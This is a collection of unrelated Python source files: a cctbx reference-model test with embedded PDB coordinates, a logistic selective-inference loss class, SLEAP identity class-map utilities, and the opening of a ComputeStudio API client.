ATOM 29 CG LEU A 4 115.539 69.386 24.562 1.00 39.82 A C
ATOM 30 CD1 LEU A 4 114.720 70.467 25.254 1.00 39.45 A C
ATOM 31 CD2 LEU A 4 114.704 68.133 24.355 1.00 40.68 A C
ATOM 32 C LEU A 4 117.854 70.938 21.778 1.00 37.77 A C
ATOM 33 O LEU A 4 117.369 71.884 21.157 1.00 37.07 A O
ATOM 34 N LYS A 5 118.763 70.124 21.249 1.00 38.27 A N
ATOM 35 CA LYS A 5 119.265 70.333 19.895 1.00 37.96 A C
ATOM 36 CB LYS A 5 120.574 71.123 19.931 1.00 37.03 A C
ATOM 37 CG LYS A 5 121.114 71.505 18.561 1.00 36.53 A C
ATOM 38 CD LYS A 5 122.352 72.380 18.680 1.00 35.38 A C
ATOM 39 CE LYS A 5 122.875 72.783 17.311 1.00 34.77 A C
ATOM 40 NZ LYS A 5 124.069 73.666 17.413 1.00 33.45 A N
ATOM 41 C LYS A 5 119.467 69.009 19.161 1.00 39.11 A C
ATOM 42 O LYS A 5 120.063 68.075 19.695 1.00 39.98 A O
ATOM 43 N GLU A 6 118.969 68.936 17.931 1.00 39.24 A N
ATOM 44 CA GLU A 6 119.059 67.716 17.133 1.00 40.35 A C
ATOM 45 CB GLU A 6 117.809 67.541 16.267 1.00 40.77 A C
ATOM 46 CG GLU A 6 116.518 67.353 17.046 1.00 40.94 A C
ATOM 47 CD GLU A 6 115.905 68.664 17.505 1.00 39.97 A C
ATOM 48 OE1 GLU A 6 116.574 69.714 17.400 1.00 39.09 A O
ATOM 49 OE2 GLU A 6 114.743 68.644 17.962 1.00 40.09 A O
ATOM 50 C GLU A 6 120.296 67.709 16.241 1.00 40.24 A C
ATOM 51 O GLU A 6 120.601 68.697 15.574 1.00 39.29 A O
ATOM 52 N SER A 7 121.001 66.584 16.234 1.00 41.20 A N
ATOM 53 CA SER A 7 122.160 66.398 15.370 1.00 41.10 A C
ATOM 54 CB SER A 7 123.431 66.187 16.197 1.00 41.10 A C
ATOM 55 OG SER A 7 123.701 67.308 17.023 1.00 40.11 A O
ATOM 56 C SER A 7 121.930 65.211 14.444 1.00 42.23 A C
ATOM 57 O SER A 7 121.956 64.061 14.881 1.00 43.35 A O
ATOM 58 N GLY A 8 121.697 65.499 13.167 1.00 42.03 A N
ATOM 59 CA GLY A 8 121.422 64.464 12.188 1.00 43.17 A C
ATOM 60 C GLY A 8 122.302 64.540 10.956 1.00 42.71 A C
ATOM 61 O GLY A 8 123.142 65.433 10.843 1.00 41.37 A O
ATOM 62 N PRO A 9 122.117 63.592 10.024 1.00 43.74 A N
ATOM 63 CD PRO A 9 121.218 62.434 10.175 1.00 45.40 A C
ATOM 64 CA PRO A 9 122.906 63.513 8.790 1.00 43.28 A C
ATOM 65 CB PRO A 9 122.804 62.037 8.414 1.00 44.75 A C
ATOM 66 CG PRO A 9 121.465 61.631 8.919 1.00 46.12 A C
ATOM 67 C PRO A 9 122.361 64.390 7.666 1.00 42.79 A C
ATOM 68 O PRO A 9 123.122 64.826 6.800 1.00 41.70 A O
ATOM 69 N GLY A 10 121.055 64.637 7.679 1.00 43.56 A N
ATOM 70 CA GLY A 10 120.425 65.454 6.659 1.00 43.32 A C
ATOM 71 C GLY A 10 119.971 64.668 5.445 1.00 44.47 A C
ATOM 72 O GLY A 10 118.831 64.801 5.000 1.00 45.36 A O
TER
ATOM 1645 N ASP B 1 94.462 51.713 21.314 1.00 38.68 B N
ATOM 1646 CA ASP B 1 94.907 52.727 20.365 1.00 39.77 B C
ATOM 1647 CB ASP B 1 94.995 52.139 18.956 1.00 40.01 B C
ATOM 1648 CG ASP B 1 95.754 53.035 18.000 1.00 41.28 B C
ATOM 1649 OD1 ASP B 1 96.565 53.857 18.476 1.00 41.67 B O
ATOM 1650 OD2 ASP B 1 95.544 52.913 16.774 1.00 41.91 B O
ATOM 1651 C ASP B 1 93.966 53.928 20.386 1.00 40.53 B C
ATOM 1652 O ASP B 1 92.746 53.766 20.440 1.00 40.33 B O
ATOM 1653 N ILE B 2 94.537 55.130 20.341 1.00 41.47 B N
ATOM 1654 CA ILE B 2 93.756 56.358 20.452 1.00 42.47 B C
ATOM 1655 CB ILE B 2 94.214 57.190 21.663 1.00 42.52 B C
ATOM 1656 CG2 ILE B 2 93.396 58.470 21.778 1.00 43.79 B C
ATOM 1657 CG1 ILE B 2 94.108 56.362 22.947 1.00 41.45 B C
ATOM 1658 CD1 ILE B 2 94.570 57.093 24.191 1.00 41.67 B C
ATOM 1659 C ILE B 2 93.841 57.180 19.168 1.00 43.93 B C
ATOM 1660 O ILE B 2 94.928 57.405 18.636 1.00 44.25 B O
ATOM 1661 N VAL B 3 92.687 57.629 18.680 1.00 45.00 B N
ATOM 1662 CA VAL B 3 92.612 58.382 17.432 1.00 46.83 B C
ATOM 1663 CB VAL B 3 91.712 57.671 16.414 1.00 47.07 B C
ATOM 1664 CG1 VAL B 3 91.747 58.390 15.074 1.00 49.24 B C
ATOM 1665 CG2 VAL B 3 92.136 56.224 16.262 1.00 45.38 B C
ATOM 1666 C VAL B 3 92.111 59.799 17.681 1.00 48.52 B C
ATOM 1667 O VAL B 3 91.117 60.002 18.375 1.00 48.59 B O
ATOM 1668 N MET B 4 92.799 60.776 17.099 1.00 49.99 B N
ATOM 1669 CA MET B 4 92.460 62.181 17.296 1.00 51.83 B C
ATOM 1670 CB MET B 4 93.658 62.944 17.866 1.00 51.35 B C
ATOM 1671 CG MET B 4 94.339 62.254 19.040 1.00 48.92 B C
ATOM 1672 SD MET B 4 93.360 62.268 20.552 1.00 48.39 B S
ATOM 1673 CE MET B 4 93.448 63.998 20.987 1.00 49.97 B C
ATOM 1674 C MET B 4 92.005 62.828 15.992 1.00 54.57 B C
ATOM 1675 O MET B 4 92.701 62.758 14.979 1.00 55.32 B O
ATOM 1676 N SER B 5 90.836 63.461 16.023 1.00 56.25 B N
ATOM 1677 CA SER B 5 90.302 64.140 14.847 1.00 59.25 B C
ATOM 1678 CB SER B 5 89.052 63.420 14.334 1.00 59.12 B C
ATOM 1679 OG SER B 5 89.335 62.070 14.010 1.00 56.93 B O
ATOM 1680 C SER B 5 89.975 65.596 15.161 1.00 61.44 B C
ATOM 1681 O SER B 5 89.374 65.889 16.191 1.00 60.75 B O
ATOM 1682 N GLN B 6 90.363 66.508 14.274 1.00 64.02 B N
ATOM 1683 CA GLN B 6 90.108 67.930 14.492 1.00 65.54 B C
ATOM 1684 CB GLN B 6 91.422 68.711 14.520 1.00 64.95 B C
ATOM 1685 CG GLN B 6 92.351 68.313 15.648 1.00 62.00 B C
ATOM 1686 CD GLN B 6 93.557 69.221 15.762 1.00 61.07 B C
ATOM 1687 OE1 GLN B 6 94.648 68.778 16.125 1.00 58.90 B O
ATOM 1688 NE2 GLN B 6 93.368 70.500 15.458 1.00 62.20 B N
ATOM 1689 C GLN B 6 89.182 68.526 13.435 1.00 68.28 B C
ATOM 1690 O GLN B 6 89.240 68.157 12.261 1.00 69.90 B O
ATOM 1691 N SER B 7 88.332 69.456 13.861 1.00 68.57 B N
ATOM 1692 CA SER B 7 87.413 70.129 12.949 1.00 70.24 B C
ATOM 1693 CB SER B 7 86.049 69.433 12.944 1.00 69.94 B C
ATOM 1694 OG SER B 7 86.154 68.099 12.477 1.00 69.41 B O
ATOM 1695 C SER B 7 87.253 71.595 13.333 1.00 69.83 B C
ATOM 1696 O SER B 7 87.048 71.909 14.503 1.00 68.66 B O
ATOM 1697 N PRO B 8 87.340 72.500 12.345 1.00 70.37 B N
ATOM 1698 CD PRO B 8 87.103 73.940 12.555 1.00 69.33 B C
ATOM 1699 CA PRO B 8 87.579 72.191 10.932 1.00 71.70 B C
ATOM 1700 CB PRO B 8 86.996 73.407 10.217 1.00 71.69 B C
ATOM 1701 CG PRO B 8 87.247 74.525 11.170 1.00 69.92 B C
ATOM 1702 C PRO B 8 89.059 72.030 10.600 1.00 71.13 B C
ATOM 1703 O PRO B 8 89.910 72.310 11.444 1.00 69.82 B O
ATOM 1704 N SER B 9 89.354 71.585 9.382 1.00 71.87 B N
ATOM 1705 CA SER B 9 90.732 71.404 8.940 1.00 70.91 B C
ATOM 1706 CB SER B 9 90.775 70.616 7.629 1.00 71.45 B C
ATOM 1707 OG SER B 9 89.977 71.234 6.633 1.00 71.72 B O
ATOM 1708 C SER B 9 91.432 72.749 8.770 1.00 69.14 B C
ATOM 1709 O SER B 9 92.628 72.878 9.037 1.00 67.60 B O
ATOM 1710 N SER B 10 90.677 73.747 8.324 1.00 69.19 B N
ATOM 1711 CA SER B 10 91.201 75.095 8.150 1.00 67.65 B C
ATOM 1712 CB SER B 10 92.017 75.200 6.860 1.00 66.83 B C
ATOM 1713 OG SER B 10 91.215 74.927 5.723 1.00 67.75 B O
ATOM 1714 C SER B 10 90.055 76.097 8.134 1.00 68.08 B C
ATOM 1715 O SER B 10 88.958 75.786 7.670 1.00 69.49 B O
TER
ATOM 3353 N GLN C 1 27.855 6.390 79.393 1.00 55.82 C N
ATOM 3354 CA GLN C 1 27.377 6.759 78.009 1.00 57.48 C C
ATOM 3355 CB GLN C 1 26.126 5.903 77.650 1.00 57.65 C C
ATOM 3356 CG GLN C 1 24.762 6.447 78.162 1.00 55.80 C C
ATOM 3357 CD GLN C 1 23.623 5.432 77.999 1.00 55.35 C C
ATOM 3358 OE1 GLN C 1 22.972 5.032 78.969 1.00 53.50 C O
ATOM 3359 NE2 GLN C 1 23.365 5.000 76.745 1.00 56.64 C N
ATOM 3360 C GLN C 1 27.097 8.250 77.886 1.00 56.46 C C
ATOM 3361 O GLN C 1 26.949 8.930 78.891 1.00 54.64 C O
ATOM 3362 N VAL C 2 27.019 8.808 76.660 1.00 57.14 C N
ATOM 3363 CA VAL C 2 26.719 10.217 76.428 1.00 55.41 C C
ATOM 3364 CB VAL C 2 27.931 10.987 75.916 1.00 55.45 C C
ATOM 3365 CG1 VAL C 2 27.552 12.336 75.269 1.00 53.41 C C
ATOM 3366 CG2 VAL C 2 28.864 11.254 77.110 1.00 54.84 C C
ATOM 3367 C VAL C 2 25.580 10.337 75.447 1.00 54.98 C C
ATOM 3368 O VAL C 2 25.617 9.750 74.367 1.00 56.38 C O
ATOM 3369 N GLN C 3 24.516 11.078 75.796 1.00 52.87 C N
ATOM 3370 CA GLN C 3 23.345 11.230 74.957 1.00 51.91 C C
ATOM 3371 CB GLN C 3 22.235 10.208 75.319 1.00 52.11 C C
ATOM 3372 CG GLN C 3 22.651 8.728 75.133 1.00 54.78 C C
ATOM 3373 CD GLN C 3 21.498 7.771 75.463 1.00 54.32 C C
ATOM 3374 OE1 GLN C 3 20.976 7.743 76.584 1.00 52.76 C O
ATOM 3375 NE2 GLN C 3 21.093 6.936 74.478 1.00 54.60 C N
ATOM 3376 C GLN C 3 22.755 12.621 75.095 1.00 49.15 C C
ATOM 3377 O GLN C 3 22.938 13.298 76.106 1.00 48.04 C O
ATOM 3378 N LEU C 4 22.017 13.068 74.065 1.00 47.90 C N
ATOM 3379 CA LEU C 4 21.268 14.320 74.040 1.00 45.28 C C
ATOM 3380 CB LEU C 4 21.893 15.309 73.052 1.00 44.69 C C
ATOM 3381 CG LEU C 4 23.323 15.776 73.331 1.00 45.36 C C
ATOM 3382 CD1 LEU C 4 23.813 16.685 72.216 1.00 44.60 C C
ATOM 3383 CD2 LEU C 4 23.407 16.483 74.670 1.00 44.38 C C
ATOM 3384 C LEU C 4 19.813 14.054 73.665 1.00 43.91 C C
ATOM 3385 O LEU C 4 19.518 13.665 72.535 1.00 44.12 C O
ATOM 3386 N GLN C 5 18.907 14.263 74.615 1.00 42.26 C N
ATOM 3387 CA GLN C 5 17.488 14.011 74.382 1.00 40.51 C C
ATOM 3388 CB GLN C 5 16.852 13.347 75.606 1.00 39.88 C C
ATOM 3389 CG GLN C 5 17.529 12.057 76.033 1.00 42.29 C C
ATOM 3390 CD GLN C 5 17.525 11.010 74.938 1.00 43.78 C C
ATOM 3391 OE1 GLN C 5 18.566 10.448 74.598 1.00 46.37 C O
ATOM 3392 NE2 GLN C 5 16.350 10.738 74.382 1.00 42.03 C N
ATOM 3393 C GLN C 5 16.760 15.304 74.047 1.00 38.05 C C
ATOM 3394 O GLN C 5 16.865 16.282 74.776 1.00 37.00 C O
ATOM 3395 N GLN C 6 16.020 15.312 72.945 1.00 37.12 C N
ATOM 3396 CA GLN C 6 15.338 16.529 72.520 1.00 34.96 C C
ATOM 3397 CB GLN C 6 15.647 16.828 71.051 1.00 35.40 C C
ATOM 3398 CG GLN C 6 17.121 17.076 70.774 1.00 37.30 C C
ATOM 3399 CD GLN C 6 17.370 17.631 69.387 1.00 37.26 C C
ATOM 3400 OE1 GLN C 6 18.353 17.285 68.732 1.00 38.80 C O
ATOM 3401 NE2 GLN C 6 16.478 18.503 68.932 1.00 35.44 C N
ATOM 3402 C GLN C 6 13.830 16.452 72.732 1.00 32.51 C C
ATOM 3403 O GLN C 6 13.230 15.380 72.646 1.00 32.39 C O
ATOM 3404 N SER C 7 13.227 17.604 73.013 1.00 30.41 C N
ATOM 3405 CA SER C 7 11.789 17.692 73.226 1.00 27.70 C C
ATOM 3406 CB SER C 7 11.431 19.008 73.916 1.00 25.77 C C
ATOM 3407 OG SER C 7 11.822 20.115 73.122 1.00 25.94 C O
ATOM 3408 C SER C 7 11.031 17.575 71.909 1.00 26.72 C C
ATOM 3409 O SER C 7 11.633 17.430 70.846 1.00 28.21 C O
ATOM 3410 N GLY C 8 9.707 17.636 71.984 1.00 24.02 C N
ATOM 3411 CA GLY C 8 8.882 17.597 70.792 1.00 22.64 C C
ATOM 3412 C GLY C 8 8.215 16.260 70.529 1.00 22.13 C C
ATOM 3413 O GLY C 8 8.319 15.342 71.342 1.00 22.76 C O
ATOM 3414 N PRO C 9 7.522 16.141 69.385 1.00 20.87 C N
ATOM 3415 CD PRO C 9 6.878 14.882 68.970 1.00 20.19 C C
ATOM 3416 CA PRO C 9 7.356 17.200 68.381 1.00 20.00 C C
ATOM 3417 CB PRO C 9 6.793 16.446 67.173 1.00 19.29 C C
ATOM 3418 CG PRO C 9 6.076 15.287 67.766 1.00 18.19 C C
ATOM 3419 C PRO C 9 6.401 18.308 68.821 1.00 17.07 C C
ATOM 3420 O PRO C 9 5.485 18.062 69.605 1.00 14.88 C O
ATOM 3421 N GLU C 10 6.626 19.516 68.314 1.00 16.93 C N
ATOM 3422 CA GLU C 10 5.849 20.679 68.723 1.00 14.34 C C
ATOM 3423 CB GLU C 10 6.778 21.768 69.269 1.00 15.71 C C
ATOM 3424 CG GLU C 10 7.498 21.386 70.554 1.00 17.24 C C
ATOM 3425 CD GLU C 10 6.559 21.288 71.742 1.00 14.84 C C
ATOM 3426 OE1 GLU C 10 5.821 22.262 71.999 1.00 12.41 C O
ATOM 3427 OE2 GLU C 10 6.556 20.236 72.416 1.00 15.30 C O
ATOM 3428 C GLU C 10 5.000 21.240 67.583 1.00 12.13 C C
ATOM 3429 O GLU C 10 5.457 21.355 66.443 1.00 13.28 C O
TER
END
"""
  model = mmtbx.model.manager(
      model_input = iotbx.pdb.input(lines=flex.split_lines(pdb_str_original),
                                    source_info=None),
      process_input=True)
  pdb_h = model.get_hierarchy()
  ref_h = pdb_h.deep_copy()
  # pdb_h.atoms().reset_i_seq()
  # ref_h.atoms().reset_i_seq()
  log = cStringIO.StringIO()
  # log = sys.stdout
  def_pars = reference_model_params
  all_pars = def_pars.fetch().extract()
  # No reference file here: the model hierarchy itself is the reference.
  all_pars.reference_model.use_starting_model_as_reference=True
  all_pars.reference_model.enabled = True
  rm = reference_model(
      model=model,
      reference_hierarchy_list=\
        [model.get_hierarchy()],
      params=all_pars.reference_model,
      log=log)
  rm.show_reference_summary(log=log)
  # Expected number of reference dihedral proxies for the 3-chain model.
  assert rm.get_n_proxies() == 141, \
      "Expecting 141 proxies, got %d" % rm.get_n_proxies()
  log_strings = log.getvalue().split("\n")
  # print "========"
  # print "\n".join(log_strings)
  # print "========"
  # Every chain must be matched to itself, not cross-matched.
  for needed_string in [
      "GLY A 8 <=====> GLY A 8",
      "PRO A 9 <=====> PRO A 9",
      "GLY A 10 <=====> GLY A 10",
      "ASP B 1 <=====> ASP B 1",
      "ILE B 2 <=====> ILE B 2",
      "SER B 10 <=====> SER B 10",
      "GLN C 1 <=====> GLN C 1",
      "VAL C 2 <=====> VAL C 2",
      ]:
    assert needed_string in log_strings, "'%s' not in log!" % needed_string
def run(args):
  """Build monomer-library services and run all reference-model exercises.

  `args` is forwarded only to the exercises that accept command-line flags.
  """
  t0 = time.time()
  import mmtbx.monomer_library
  # Shared monomer library and energy library reused by every exercise.
  mon_lib_srv = mmtbx.monomer_library.server.server()
  ener_lib = mmtbx.monomer_library.server.ener_lib()
  exercise_reference_model(args, mon_lib_srv, ener_lib)
  exercise_multiple_to_one(args, mon_lib_srv, ener_lib)
  exercise_multiple_ncs_groups_found(mon_lib_srv, ener_lib)
  exercise_cutted_residue(mon_lib_srv, ener_lib)
  exercise_dna(mon_lib_srv, ener_lib)
  exercise_3chains_self(mon_lib_srv, ener_lib)
  # Python 2 print statement -- this module predates print_function.
  print "OK. Time: %8.3f"%(time.time()-t0)
# Script entry point: forward command-line arguments to the test runner.
if (__name__ == "__main__"):
  run(args=sys.argv[1:])
|
import numpy as np
from base import selective_loss
import regreg.api as rr
class logistic_Xrandom(selective_loss):
    """Logistic-regression loss with a random design matrix X.

    Extends the project ``selective_loss`` base class with the pieces needed
    for selective inference: an unpenalized refit on the active set
    (``fit_E``), a nonparametric bootstrap of the covariance of the
    sufficient statistic X^T y (``bootstrap_covariance``), and the
    gradient / Hessian / proposal hooks used by the conditional sampler.
    """

    def __init__(self, X, y,
                 coef=1.,
                 offset=None,
                 quadratic=None,
                 initial=None):
        # The problem dimension is the number of design columns.
        selective_loss.__init__(self, X.shape[1],
                                coef=coef,
                                offset=offset,
                                quadratic=quadratic,
                                initial=initial)
        # Defensive copies: callers mutating X / y afterwards must not
        # change this loss object.
        self.X = X.copy()
        self.y = y.copy()
        self._restricted_grad_beta = np.zeros(self.shape)

    def smooth_objective(self, beta, mode='both',
                         check_feasibility=False):
        """Evaluate the logistic loss (and/or gradient) at ``beta``.

        Delegates to ``regreg``'s logistic loss.
        NOTE(review): coef=n/2 rescales the loss relative to the default;
        presumably chosen to match the sampler's target density -- confirm
        against the calling code.
        """
        _loss = rr.logistic_loss(self.X, self.y, coef=self.X.shape[0]/2.)
        return _loss.smooth_objective(beta, mode=mode, check_feasibility=check_feasibility)

    # this is something that regreg does not know about, i.e.
    # what is data and what is not...

    def fit_E(self, active, solve_args={'min_its':50, 'tol':1.e-10}):
        """
        Fit the logistic regression after seeing the active set, without
        penalty, then bootstrap the covariance matrix.

        Parameters:
        ----------
        active: boolean mask -- the active set from fitting the logistic lasso
        solve_args: passed to regreg.simple_problem.solve

        Returns:
        --------
        None.  Sets ``self._beta_unpenalized`` (used in the covariance
        calculation) as a side effect.

        NOTE(review): the mutable default ``solve_args`` is shared across
        calls; harmless as long as callees do not mutate it.
        """
        self.active = active
        if self.active.any():
            self.inactive = ~active
            # Restrict the design to the active columns and refit with no
            # penalty.
            X_E = self.X[:, self.active]
            loss_E = rr.logistic_loss(X_E, self.y)
            self._beta_unpenalized = loss_E.solve(**solve_args)
            self.bootstrap_covariance()
        else:
            raise ValueError("Empty active set.")

    def bootstrap_covariance(self):
        """
        Bootstrap the covariance matrix of the sufficient statistic $X^T y$,
        through the use of the restricted unpenalized solution to the
        problem $\bar{beta}_E$.

        Sets the ``_cov`` field to the bootstrapped covariance matrix and
        ``L`` to its Cholesky factor.  The result is cached: repeated calls
        are no-ops once ``_cov`` exists.
        """
        if not hasattr(self, "_beta_unpenalized"):
            raise ValueError("method fit_E has to be called before computing the covariance")

        if not hasattr(self, "_cov"):
            # nonparametric bootstrap for covariance of X^Ty
            X, y = self.X, self.y
            n, p = X.shape
            # Number of bootstrap resamples.
            nsample = 2000

            def pi(X):
                # Fitted success probabilities under the restricted model.
                w = np.exp(np.dot(X[:,self.active], self._beta_unpenalized))
                return w / (1 + w)

            _mean_cum = 0
            self._cov = np.zeros((p, p))
            for _ in range(nsample):
                # Resample rows with replacement and accumulate the
                # centered score Z* = X*^T (y* - pi(X*)).
                indices = np.random.choice(n, size=(n,), replace=True)
                y_star = y[indices]
                X_star = X[indices]
                Z_star = np.dot(X_star.T, y_star - pi(X_star))
                _mean_cum += Z_star
                self._cov += np.multiply.outer(Z_star, Z_star)
            # Sample covariance: E[ZZ^T] - E[Z]E[Z]^T.
            self._cov /= nsample
            _mean = _mean_cum / nsample
            self._cov -= np.multiply.outer(_mean, _mean)
            # Cholesky factor, kept for generating correlated proposals.
            self.L = np.linalg.cholesky(self._cov)

    @property
    def covariance(self, doc="Covariance of sufficient statistic $X^Ty$."):
        # NOTE(review): the ``doc`` parameter is never supplied by @property
        # access and is effectively dead; the conventional spelling would be
        # property(fget, doc=...).  Left unchanged to preserve the interface.
        if not hasattr(self, "_cov"):
            self.bootstrap_covariance()
        return self._cov

    def gradient(self, data, beta):
        """
        Gradient of smooth part restricted to active set, linearized via the
        bootstrapped covariance: g = -(data - cov . beta).
        """
        if not hasattr(self, "_cov"):
            self.bootstrap_covariance()
        g = -(data - np.dot(self._cov, beta))
        return g

    def hessian(self, data, beta):
        """
        hessian is constant in this case -- the bootstrapped covariance.
        """
        if not hasattr(self, "_cov"):
            self.bootstrap_covariance()
        return self._cov

    def setup_sampling(self, data, mean, linear_part, value):
        """
        Set up the sampling conditioning on the KKT constraints as well as
        the linear constraints C * data = d

        Parameters:
        ----------
        data:
            The subject of the sampling. In this case the gradient of loss at 0.
        mean: \beta^0_E
        sigma: default to None in logistic lasso
        linear_part: C
        value: d
        """
        self.accept_data = 0
        self.total_data = 0

        # P projects onto the row space of C; R = I - P is the projector
        # onto its null space, so proposals stay feasible for C*data = d.
        P = np.dot(linear_part.T, np.linalg.pinv(linear_part).T)
        I = np.identity(linear_part.shape[1])

        self.data = data
        self.mean = mean
        self.R = I - P
        self.P = P
        self.linear_part = linear_part

    def proposal(self, data):
        """Random-walk proposal restricted to the null space of C."""
        if not hasattr(self, "L"):
            self.bootstrap_covariance()
        n, p = self.X.shape
        stepsize = 1. / np.sqrt(p)
        #new = data + stepsize * np.dot(self.R,
        #                               np.dot(self.L, np.random.standard_normal(p)))
        new = data + stepsize * np.dot(self.R,
                                       np.random.standard_normal(p))
        log_transition_p = self.logpdf(new) - self.logpdf(data)
        return new, log_transition_p

    def logpdf(self, data):
        # Gaussian log-density (up to a constant) with the bootstrapped
        # covariance.  NOTE(review): assumes ``_cov`` exists, i.e. that
        # fit_E/bootstrap_covariance ran first -- confirm callers guarantee it.
        return -((data-self.mean)*np.dot(np.linalg.pinv(self._cov), data-self.mean)).sum() / 2

    def update_proposal(self, state, proposal, logpdf):
        # Symmetric proposal: nothing to adapt.
        pass
|
"""Utilities for generating data for track identity models."""
import sleap
import tensorflow as tf
import attr
from typing import List, Text
def make_class_vectors(class_inds: tf.Tensor, n_classes: int) -> tf.Tensor:
    """Encode class indices as binary one-hot vectors.

    Args:
        class_inds: `tf.int32` tensor of shape `(n_instances,)` with the class
            index of each instance. An index of `-1` denotes "no class".
        n_classes: Integer maximum number of classes (length of each vector).

    Returns:
        A `(n_instances, n_classes)` tensor of dtype `tf.int32`. Rows for
        instances with no class are all zeros (`tf.one_hot` leaves
        out-of-range indices as zero vectors).

    Notes: A class index can be used to represent a track index.
    """
    encoded = tf.one_hot(class_inds, n_classes, dtype=tf.int32)
    return encoded
def make_class_maps(
    confmaps: tf.Tensor, class_inds: tf.Tensor, n_classes: int, threshold: float = 0.2
) -> tf.Tensor:
    """Generate identity class maps masked by instance confidence maps.

    This restricts the class maps to local neighborhoods around the peaks.

    Args:
        confmaps: Per-instance confidence maps as a `tf.float32` tensor of
            shape `(grid_height, grid_width, n_instances)`, e.g. from
            `sleap.nn.data.confidence_maps.make_confmaps`.
        class_inds: Class indices as a `tf.int32` tensor of shape
            `(n_instances,)`.
        n_classes: Integer maximum number of classes.
        threshold: Confidence values at or below this are zeroed out of the
            mask.

    Returns:
        Class maps of shape `(grid_height, grid_width, n_classes)` and dtype
        `tf.float32`; each channel is nonzero where the corresponding
        instance's confidence exceeded the threshold.

    Notes:
        Where several instances overlap, the class vectors are weighed by the
        relative contribution of each instance at that pixel.

    See also: make_class_vectors, sleap.nn.data.confidence_maps.make_confmaps
    """
    num_classes = tf.squeeze(n_classes)
    num_instances = tf.shape(confmaps)[2]

    # One-hot vectors broadcastable against the (h, w, n_instances, 1) mask.
    vectors = tf.reshape(
        tf.cast(make_class_vectors(class_inds, num_classes), tf.float32),
        [1, 1, num_instances, num_classes],
    )

    # Per-pixel relative contribution of each instance, thresholded.
    weights = confmaps / tf.reduce_sum(confmaps, axis=2, keepdims=True)
    weights = tf.where(confmaps > threshold, weights, 0.0)  # (h, w, n_instances)
    weights = tf.expand_dims(weights, axis=3)  # (h, w, n_instances, 1)

    # Collapse the instance axis to obtain the per-class maps.
    return tf.reduce_max(weights * vectors, axis=2)
@attr.s(auto_attribs=True)
class ClassVectorGenerator:
    """Transformer to generate class probability vectors from track indices."""

    @property
    def input_keys(self) -> List[Text]:
        """Return the keys that incoming elements are expected to have."""
        return ["track_inds", "n_tracks"]

    @property
    def output_keys(self) -> List[Text]:
        """Return the keys that outgoing elements will have."""
        return self.input_keys + ["class_vectors"]

    def transform_dataset(self, input_ds: tf.data.Dataset) -> tf.data.Dataset:
        """Create a dataset that contains the generated class identity vectors.

        Args:
            input_ds: A dataset whose elements contain the keys `"track_inds"`
                and `"n_tracks"`.

        Returns:
            A `tf.data.Dataset` with the same keys as the input plus a
            `"class_vectors"` key holding the generated vectors.
        """

        def _add_class_vectors(frame):
            """Attach float class vectors to a single dataset element."""
            vectors = make_class_vectors(frame["track_inds"], frame["n_tracks"])
            frame["class_vectors"] = tf.cast(vectors, tf.float32)
            return frame

        return input_ds.map(
            _add_class_vectors, num_parallel_calls=tf.data.experimental.AUTOTUNE
        )
@attr.s(auto_attribs=True)
class ClassMapGenerator:
    """Transformer to generate class maps from track indices.

    Attributes:
        sigma: Standard deviation of the 2D Gaussian distribution sampled to
            generate the confidence maps used for masking the identity maps.
            Expressed in units of the input image's grid, i.e., scaling applied
            in previous steps is not taken into account.
        output_stride: Relative stride of the generated maps. This is
            effectively the reciprocal of the output scale, i.e., increase this
            to generate maps that are smaller than the input images.
        centroids: If `True`, generate masking confidence maps for centroids
            rather than instance points.
        class_map_threshold: Minimum confidence map value below which map
            values will be replaced with zeros.
    """

    sigma: float = 2.0
    output_stride: int = 1
    centroids: bool = False
    class_map_threshold: float = 0.2

    @property
    def input_keys(self) -> List[Text]:
        """Return the keys that incoming elements are expected to have."""
        point_key = "centroids" if self.centroids else "instances"
        return [point_key, "track_inds", "n_tracks"]

    @property
    def output_keys(self) -> List[Text]:
        """Return the keys that outgoing elements will have."""
        return self.input_keys + ["class_maps"]

    def transform_dataset(self, input_ds: tf.data.Dataset) -> tf.data.Dataset:
        """Create a dataset that contains the generated class identity maps.

        Args:
            input_ds: A dataset with elements that contain the keys `"image"`,
                `"track_inds"`, `"n_tracks"` and either `"instances"` or
                `"centroids"` depending on whether the `centroids` attribute is
                set to `True`.

        Returns:
            A `tf.data.Dataset` with the same keys as the input, as well as a
            `"class_maps"` key containing the generated class maps.
        """
        # Peek at a single example to recover the full-scale image dimensions
        # needed for building the sampling grid.
        first_example = next(iter(input_ds))
        grid_height = first_example["image"].shape[0]
        grid_width = first_example["image"].shape[1]

        # Generate sampling grid vectors.
        xv, yv = sleap.nn.data.confidence_maps.make_grid_vectors(
            image_height=grid_height,
            image_width=grid_width,
            output_stride=self.output_stride,
        )

        def _add_class_maps(frame_data):
            """Local processing function for dataset mapping."""
            if self.centroids:
                # (1, n_instances, 2)
                pts = tf.expand_dims(frame_data["centroids"], axis=0)
            else:
                # (n_nodes, n_instances, 2)
                pts = tf.transpose(frame_data["instances"], [1, 0, 2])

            # Generate confidence maps for masking.
            # (height, width, n_instances)
            cms = sleap.nn.data.confidence_maps.make_multi_confmaps(
                pts, xv, yv, self.sigma * self.output_stride
            )
            frame_data["class_maps"] = make_class_maps(
                cms,
                class_inds=frame_data["track_inds"],
                n_classes=frame_data["n_tracks"],
                threshold=self.class_map_threshold,
            )
            return frame_data

        # Map transformation.
        return input_ds.map(
            _add_class_maps, num_parallel_calls=tf.data.experimental.AUTOTUNE
        )
|
from io import StringIO
from pathlib import Path
import time
from typing import Optional
import os
import warnings
import requests
try:
import pandas as pd
except ImportError as ie:
pd = None
from cs_kit.exceptions import APIException
class ComputeStudio:
    """
    Python client for the ComputeStudio webapp.

    - Run simulations
    - Update simulation metadata
    - Download your results

    .. code-block:: python

        client = ComputeStudio("PSLmodels", "TaxBrain")
        client.create()

    Learn how to get your API token from the
    `Authentication docs <https://docs.compute.studio/api/auth.html>`_. Once you
    have your token, you can save it in a file named ``.cs-api-token`` in the
    home directory of your computer. You can also set it as an environment
    variable (``CS_API_TOKEN``) or pass it directly to the ``ComputeStudio``
    class.
    """

    host = "https://compute.studio"

    def __init__(self, owner: str, title: str, api_token: Optional[str] = None):
        self.owner = owner
        self.title = title
        api_token = self.get_token(api_token)
        self.auth_header = {"Authorization": f"Token {api_token}"}
        self.sim_url = f"{self.host}/{owner}/{title}/api/v1/"
        self.inputs_url = f"{self.host}/{owner}/{title}/api/v1/inputs/"

    def create(self, adjustment: dict = None, meta_parameters: dict = None):
        """
        Create a simulation on Compute Studio.

        Parameters
        ----------
        adjustment : dict
            Parameter values in the `ParamTools format <https://paramtools.dev/api/reference.html>`_.
        meta_parameters: dict
            Meta parameters for the simulation in a ``key:value`` format.

        Returns
